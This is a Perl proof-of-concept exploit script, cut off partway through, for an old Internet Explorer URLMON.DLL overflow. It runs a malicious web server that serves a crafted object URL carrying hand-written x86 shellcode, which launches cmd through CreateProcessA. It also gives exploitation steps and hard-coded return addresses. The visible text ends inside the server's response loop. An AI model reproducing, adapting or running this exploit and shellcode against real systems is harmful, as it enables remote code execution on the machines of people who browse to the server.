#!/usr/bin/perl # # Proof of concept exploit by Alumni # IE-Object longtype dynamic call oferflow # [...] # url://<$shellcode><'/'x48> # the flaw actually exists in URLMON.DLL when converting backslashes # to wide char, # this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'. # [...] # # To exploit: i) start server perl script; # ii) connect to http-service using IE/5.x. # Tested: IE-5.x, 6.0? on WinXP. # Note: a) the shellcode size is limited up to 56 bytes; # b) the '$ret' may differ as well as the image base of KERNEL32.DLL; # c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript. # use IO::Socket; $port = 80; $server = IO::Socket::INET->new (LocalPort => $port, Type =>SOCK_STREAM, Reuse => 1, Listen => $port) or die("Couldnt't create server socket\n"); $shellcode = "\x33\xdb". # xor ebx, ebx "\x8b\xd4". # mov edx, esp "\x80\xc6\xff". # add dh, 0xFF "\xc7\x42\xfc\x63\x6d". # mov dword ptr[edx-4], 0x01646D63 ("cmd\x01") "\x64\x01". # "\x88\x5a\xff". # mov byte ptr[edx-1], bl "\x8d\x42\xfc". # lea eax, [edx-4] "\x8b\xf5". # mov esi, ebp "\x56\x52". # push esi; push edx "\x53\x53\x53\x53\x53\x53". # push ebx "\x50\x53". # push eax; push ebx "\xb8\x41\x77\xf7\xbf". # mov eax, 0xBFF77741 ~= CreateProcessA "\xff\xd0". # call eax "\xb8\xf8\xd4\xf8\xbf". # mov eax, 0xBFF8D4F8 ~= ExitProcess "\xff\xd0". # call eax "\xcc"; # int 3 $nop = "\x90"; $ret = "\\xAB\\x5D\\x58"; while ($client = $server->accept()) { while (<$client>) { if ($_ =~ /^(\x0D\x0A)/) { print $client <